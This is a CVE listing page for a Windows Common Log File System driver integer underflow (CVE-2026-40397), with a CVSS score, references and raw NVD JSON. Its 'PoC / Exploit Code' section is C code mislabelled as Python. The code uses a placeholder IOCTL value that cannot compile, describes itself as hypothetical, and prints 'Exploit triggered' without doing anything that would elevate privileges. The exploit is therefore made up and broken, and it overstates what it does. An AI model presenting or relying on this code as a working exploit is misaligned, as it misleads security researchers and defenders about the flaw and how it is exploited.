CVE-2026-40397

Description

Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

具体受影响版本请参考Microsoft安全响应中心（MSRC）公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>
#include <stdio.h>

// Hypothetical IOCTL for CLFS interaction
#define CLFS_IOCTL_VULN 0xXXXX

int main() {
    HANDLE hDevice = CreateFileA("\\\\.\\Clfs", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }

    // Buffer designed to trigger integer underflow
    BYTE inputBuffer[0x20];
    memset(inputBuffer, 0x41, sizeof(inputBuffer));

    // Set specific offset to cause calculation error (e.g., size field)
    // Setting size to 0 might cause underflow if driver subtracts header size
    *(DWORD*)(inputBuffer + 0x10) = 0x0;

    DWORD bytesReturned;
    BOOL result = DeviceIoControl(
        hDevice,
        CLFS_IOCTL_VULN,
        inputBuffer,
        sizeof(inputBuffer),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (result) {
        printf("Exploit triggered. Check privileges.\n");
    } else {
        printf("IOCTL failed. Error: %d\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40397
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40397
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40397/
[4] VulDB https://vuldb.com/cve/CVE-2026-40397
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40397

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40397", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:17.273", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40397", "source": "[email protected]"}]}}